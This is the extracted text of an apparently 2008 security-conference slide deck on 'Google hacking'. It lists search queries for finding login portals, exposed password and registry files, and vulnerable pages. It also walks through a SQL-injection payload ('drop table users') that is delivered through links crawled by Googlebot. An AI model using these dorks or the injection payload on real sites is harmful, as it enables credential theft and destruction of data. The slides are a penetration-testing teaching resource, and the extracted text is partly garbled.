SlideShare ist ein Scribd-Unternehmen logo
1 von 66
Downloaden Sie, um offline zu lesen
Dirty Attacks with Google Hacking

Prathan Phongthiproek
ACIS Professional Center
Information Security Consultant – Penetration Tester
November 16th, 2008
Dirty Attacks
           With
  Google hacking
                                   What I’ve done ?!

                                     Penetration Testing (BlackBox and WhiteBox)
What is Google
Hacking?
What a Hacker Can do
                                     Security Consultant ( I Hate this job !!)
with vulnerable Web?
Google Hacking                       Active Security Researcher
Database (GHDB)
--------------------------------
Google Hacking
                                     Devoted Hacker
basics
Google Advanced                      Exploits and Vulnerabilities Disclosure
Operators
--------------------------------
                                      (CWH Underground)
Locating Exploits and
Finding Targets                      Tools: g00mail Enumerator, SQLFuzzer, 4ppCrawl3r, Spike
Tracking Down Web                     Bot (Developing) Etc..
Servers, Login
Portals, etc..
Dirty Attacks using                  Comments, Feedback ? >> prathan.ptr@gmail.com !
Googlebot                           (Don’t spam mail !! lol)!
Google Hacking Tools
--------------------------------                               #w
                                                               03:19:18 up 1 min, 1 user, load average: 1.73, 0.71, 0.26
                                                               USER                  TTY FROM        LOGIN@ IDLE JCPU PCPU
                                                               prathan phongthiproek tty1 -           03:18      0.00s 0.08s 0.01s
Dirty Attacks
           With
  Google hacking
                                   What is Google Hacking ?!

                                     It is NOT hacking into Google!!
What is Google                           (Hacking Google: Sidejacking, XSS Spreadsheet, etc)
Hacking?                             Google is much more than just a simple search
What a Hacker Can do
with vulnerable Web?
                                      interface and engine.
Google Hacking                       Google hacking is the use of a search engine to locate a security vulnerability on the
Database (GHDB)                       Internet
--------------------------------
                                     Google crawls public websites for information using
Google Hacking
basics
                                      an automated search and record program called
Google Advanced
                                      “Googlebot”.
Operators                            IRC Bot using Google Hacking to find Vulnerability
--------------------------------      and Exploits
Locating Exploits and
Finding Targets
                                     Refers to using the Google search engine in an effort to pull sensitive information, such
Tracking Down Web
                                      as credit card numbers, out of a poorly constructed Web application !
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   What is Google Hacking ?!

                                     Johnny Long is the “grandfather” of Google hacking.
What is Google                       His website http://johnny.ihackstuff.com is exclusively
Hacking?
                                      dedicated to Google Hacking and you will find all sorts
What a Hacker Can do
with vulnerable Web?                  of cool information there.
Google Hacking                       Johnny Long
Database (GHDB)
                                       •  Wrote Google Hacking for Penetration Testers; ISBN
--------------------------------          1597491764
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
What a Hacker Can do with
    Dirty Attacks
           With
  Google hacking                   Vulnerable Web ?!
                                                         When an attacker knows the sort of vulnerability he !
What is Google
Hacking?                           wants to exploit but has no specific target,	
  The	
  Best	
  Solu-on	
  is	
  “Dirty	
  Google	
  
What a Hacker
                                                                       Search	
  operators”
Can do with
vulnerable Web?                        File Inclusion (RFI, LFI)
Google Hacking
Database (GHDB)                        SQL Injection
--------------------------------       Remote Code Execution
Google Hacking
basics
                                       Arbitrary Add Admin
Google Advanced                        Arbitrary File Upload
Operators
                                       XSS / XSRF
--------------------------------
Locating Exploits and
                                       Directory Listing
Finding Targets                        Directory Traversal
Tracking Down Web
Servers, Login
                                       Source code disclosure
Portals, etc..                         Administrative Login Portals
Dirty Attacks using
Googlebot
                                       Web server Information
Google Hacking Tools                   Reveal Pathnames and Filenames
--------------------------------       Social Engineering (Damn !! How do you get my address)
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Database (GHDB)!

                                          We call them “googledorks”	
  :	
  Inept or foolish people as revealed by Google. 	
  
What is Google
Hacking?
What a Hacker Can do                   Advisories and Vulnerabilities
with vulnerable Web?
                                       Error Messages that contain too much information
Google Hacking
Database (GHDB)                        Files containing usernames and passwords
--------------------------------       Footholds and juicy Info
Google Hacking                         Pages containing login portals
basics
Google Advanced
                                       Pages containing network or vulnerability data
Operators                              Sensitive Directories
--------------------------------
                                       Sensitive Online Shopping Info
Locating Exploits and
Finding Targets                        Vulnerable Files and Servers
Tracking Down Web                      Web Server Detection
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Database (GHDB)!

                                          h;p://johnny.ihackstuff.com/ghdb.php. 	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?

Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Database (GHDB)!

                                            Pages	
  containing	
  login	
  portals	
   	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?

Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Database (GHDB)!

                                         in-tle:"ColdFusion	
  Administrator	
  Login" 	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?

Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking Database (GHDB)!

                                           “ColdFusion	
  Administrator	
  Login" 	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?

Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking basics!

                                   Crawl	
  Website	
  Informa-on	
  with	
  Caches	
  	
  	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------

Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking basics!

                                   Using	
  Google	
  as	
  a	
  Proxy	
  Server	
  	
  	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------

Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Hacking basics!

                                   Basic	
  Search	
  Operators	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                     Use the plus sign (+) to force a search for an overly
Google Hacking
Database (GHDB)
                                      common word
--------------------------------     Use the minus sign (-) to exclude a term from a
Google Hacking
                                      search
basics                               (|) / OR, admin | administrator
Google Advanced                      To search for a phrase, supply the phrase
Operators
                                      surrounded by double quotes (" ")
--------------------------------
Locating Exploits and
                                     A period (.) serves as a single-character wildcard.
Finding Targets                      An asterisk (*) represents any word - not the
Tracking Down Web                     completion of a word, as is traditionally used
Servers, Login
Portals, etc..                       Mixed searches, Can involve both phrases and
Dirty Attacks using                   individual terms
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Advanced	
  Search	
  Operators	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                       filetype:
Google Hacking
Database (GHDB)                        info:
--------------------------------       define:
Google Hacking
basics
                                       intext:
Google
                                       inurl:
Advanced                               intitle:
Operators                              inanchor:
--------------------------------
Locating Exploits and
                                       link:
Finding Targets                        site:
Tracking Down Web
Servers, Login
                                       stocks:
Portals, etc..                         cache:
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Website	
  Informa-on	
  Gathering	
  –	
  “site:www.amazon.com”	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!
                                        Subdomains	
  Gathering	
  –	
  “site:amazon.com	
  	
  
What is Google                                 –site:www.amazon.com”	
  !
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Website	
  containing	
  Error	
  Message	
  –	
  “Error	
  |	
  Warning	
  site:…”	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Directory	
  Lis-ng	
  –	
  in-tle:index.of	
  admin	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Directory	
  Lis-ng	
  –	
  in-tle:index.of	
  WS_FTP.LOG	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Web	
  server	
  Informa-on	
  –	
  in-tle:index.of	
  “Server	
  at”	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   Administra-ve	
  Login	
  Portals	
  –	
  “admin	
  login”	
  	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   File	
  robots.txt	
  –	
  “inurl:robots.txt”	
  	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                      Vulnerable	
  File	
  (Robpoll.cgi)	
  –	
  “inurl:robpoll.cgi filetype:cgi” !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

                                   File	
  containing	
  password	
  –	
  “AutoCreate=TRUE	
  password=*”!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

What is Google
                                       MS	
  Access	
  DB	
  password	
  –	
  “inurl:admin	
  mdb”!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

What is Google
                                       MS	
  Access	
  DB	
  password	
  –	
  “inurl:admin	
  mdb”!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

What is Google
                                         Password	
  File	
  –	
  “index	
  of	
  /etc"	
  passwd!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Google Advanced Operators!

What is Google
                                          Crack	
  /	
  Keygen…	
  –	
  94FBR	
  sobware!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics

Google
Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Loca-ng	
  Exploits	
  Via	
  Common	
  Code	
  Strings	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                     Another way to locate exploit code is to focus on
Google Hacking
Database (GHDB)
                                          common strings within the source code itself
--------------------------------     One way to do this is to focus on common inclusions
Google Hacking                            or header file references
basics
                                     For Example, many C programs include the standard
Google Advanced
Operators
                                          input/output library functions, which are references by
--------------------------------
                                          an include statement such as #include <stdio.h>
                                          within the source code
Locating Exploits
and Finding                          A query like this would locate C source code that
Targets                                   contained the word exploit, regardless of the file’s
Tracking Down Web                         extension:
Servers, Login
Portals, etc..
                                     	
        	
  	
  
Dirty Attacks using
Googlebot
                                                  “#include	
  <stdio.h>”	
  exploit	
  
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Loca-ng	
  Exploits	
  Via	
  Common	
  Code	
  Strings	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------

Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Loca-ng	
  Exploits	
  Via	
  Common	
  Code	
  Strings	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------

Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Loca-ng	
  Targets	
  Via	
  Demonstra-on	
  Pages	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                     Develop a query string to locate vulnerable targets on
Google Hacking
Database (GHDB)
                                          the Web; the vendor’s Website is a good place to
--------------------------------
                                          discover what exactly the product’s Web pages look
Google Hacking
                                          like
basics                               For Example, some administrators might modify the
Google Advanced                           format of a vendor-supplied Web page to fit the
Operators
                                          theme of the site
--------------------------------
                                     These types of modifications can impact the
Locating Exploits                         effectiveness of a Google search that targets a
and Finding
Targets
                                          vendor-supplied page format
Tracking Down Web                    You can find that most sites look very similar and that
Servers, Login                            nearly every site has a “Powered by” message at the
Portals, etc..
                                          bottom of the main page
Dirty Attacks using
Googlebot                            	
        	
  	
  	
  	
  
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Loca-ng	
  Targets	
  Via	
  Source	
  Code	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
                                     A hacker might use the source code of a program to
Google Hacking
Database (GHDB)
                                          discover ways to search for that software with Google
--------------------------------     To find the best search string to locate potentially
Google Hacking                            vulnerable targets, you can visit the Web page of the
basics                                    software vendor to find the source code of the
Google Advanced                           offending software
Operators
--------------------------------
                                     In case where source code is not available, an
                                          attacker might opt to simply download the offending
Locating Exploits                         software and run it on a machine he controls to get
and Finding
Targets
                                          ideas for potential searches
Tracking Down Web                    	
        	
  	
  	
  	
  
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Vulnerable	
  Web	
  Applica-on	
  Examples!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------

Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Vulnerable	
  Web	
  Applica-on	
  Examples!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------

Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Locating Exploits and Finding Targets!

                                   Finding	
  targets	
  via	
  “powered	
  by”	
  –	
  “Powered	
  By	
  cubecart”	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------

Locating Exploits
and Finding
Targets
Tracking Down Web
Servers, Login
Portals, etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Query	
  for	
  “Microsob-­‐IIS/5.0	
  Server	
  at” !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   IIS	
  HTTP/1.1	
  Error	
  Page	
  Titles!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Query	
  for	
  IIS	
  	
  5.0	
  –	
  intext:“404	
  Object	
  Not	
  Found”	
  Microsob	
  
What is Google
Hacking?
                                                                                   IIS/5.0!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Query	
  for	
  “Apache”	
  “Server	
  at”	
  –in-tle:index.of	
  in-tle:error	
  !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Apache	
  2.0	
  Error	
  Pages!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Default	
  Pages	
  for	
  Web	
  Servers!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                     Outlook	
  Web	
  Access	
  Default	
  Portal	
  –	
  inurl:“exchange/
What is Google
Hacking?
                                                                   logon.asp”!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Windows	
  Registry	
  Entries	
  Can	
  Reveal	
  Passwords	
  –	
  filetype:reg	
  
What is Google
Hacking?
                                                    intext:"internet	
  account	
  manager"!
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Error	
  Message	
  for	
  File	
  Inclusion	
  –	
  “Warning:	
  Failed	
  opening"	
   !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Error	
  Message	
  for	
  File	
  Inclusion	
  –	
  “Warning:	
  Failed	
  opening"	
   !
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Error	
  Message	
  for	
  SQL	
  Injec-on	
  –	
  “Microsob	
  OLE	
  DB	
  Provider	
  
What is Google
Hacking?
                                                                for	
  ODBC	
  Drivers	
  error”	
  	
  !
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                   Error	
  Message	
  for	
  SQL	
  Injec-on	
  –	
  “Microsob	
  OLE	
  DB	
  Provider	
  
What is Google
Hacking?
                                                                for	
  ODBC	
  Drivers	
  error”	
  	
  !
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Tracking Down Web Servers, Log
    Dirty Attacks
           With
  Google hacking                   Portals, etc..!
                                      Error	
  Message	
  for	
  XSS/XSRF	
  –	
  inurl:“error.asp?msg=”!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets

Tracking Down
Web Servers,
Login Portals,
etc..
Dirty Attacks using
Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

What is Google
                                    Googlebot,	
  Google’s	
  Web	
  Crawler!
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
                                   <a href=http://www.mict.go.th>MICT</a>
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..

Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!
                                   Google’s	
  Query	
  Processor!
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
Database (GHDB)
--------------------------------
Google Hacking
basics
Google Advanced
Operators
--------------------------------
Locating Exploits and
Finding Targets
Tracking Down Web
Servers, Login
Portals, etc..

Dirty Attacks
using Googlebot
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   SQL	
  Injec-on	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
                                      We search in Google one of signatures:
Database (GHDB)
                                            inurl:”.asp?id=“,inurl:”?name=“,”Microsoft OLE
--------------------------------
Google Hacking
                                      DB Provider for SQL Server”
basics
                                      Finding the link:
Google Advanced
Operators                                   http://www.hackme.com/cat.asp?ID=1
--------------------------------
Locating Exploits and
                                      Create the file test.html the code is:
Finding Targets
                                         <html>
Tracking Down Web
Servers, Login                           <a href=“http://www.hackme.com/cat.asp?
Portals, etc..
                                          ID=1+drop+table+’users’—”>Click Here</a>
Dirty Attacks
using Googlebot                          </html>
Google Hacking Tools
--------------------------------
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   SQL	
  Injec-on	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do
with vulnerable Web?
Google Hacking
                                        Then upload to:
Database (GHDB)
                                          http://www.mysite.com/test.html
--------------------------------
Google Hacking                          After a few days GoogleBot will index the file:
basics
Google Advanced
                                          http://www.mysite.com/test.html
Operators
                                        Then index the link “Click Here” inside the file:
--------------------------------
Locating Exploits and                     http://www.hackme.com/cat.asp?ID=1+drop+table
Finding Targets
                                          +’users’—
Tracking Down Web
Servers, Login                          The application SQL query is:
Portals, etc..

Dirty Attacks                             SELECT Username FROM users WHERE ID=1
using Googlebot                           drop table ‘users’—
Google Hacking Tools
--------------------------------
                                        The Result: The table “users” has been deleted,
                                          thanks to Google
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!
                                   Google’s	
  Query	
  Processor!
                                                                           <a href=“http://
What is Google
Hacking?
                                                                           www.hackeme.co
                                                                           m/cat.asp?
What a Hacker Can do
with vulnerable Web?
                                                                           ID=1+drop+table
                                                                           +’users’—”>Click
Google Hacking
Database (GHDB)
                                                                           Here</a>
--------------------------------
Google Hacking
basics                                    <a href=“http://
Google Advanced                           www.hackeme.co
Operators                                 m/cat.asp?
--------------------------------          ID=1+drop+table
Locating Exploits and                     +’users’—”>Click
Finding Targets                           Here</a>
Tracking Down Web
Servers, Login
Portals, etc..

Dirty Attacks
using Googlebot
Google Hacking Tools
                                                      /cat.asp?ID=1+drop
--------------------------------                      +table+’users’—
Dirty Attacks
           With
  Google hacking
                                   Dirty Attacks using Googlebot!

                                   Cross	
  Site	
  Framing	
  via	
  Googlebot	
  
What is Google
Hacking?
What a Hacker Can do                   We search in Google one of signatures:
with vulnerable Web?
                                         inurl:”.asp?msg=“,inurl:”.asp?title=“,..
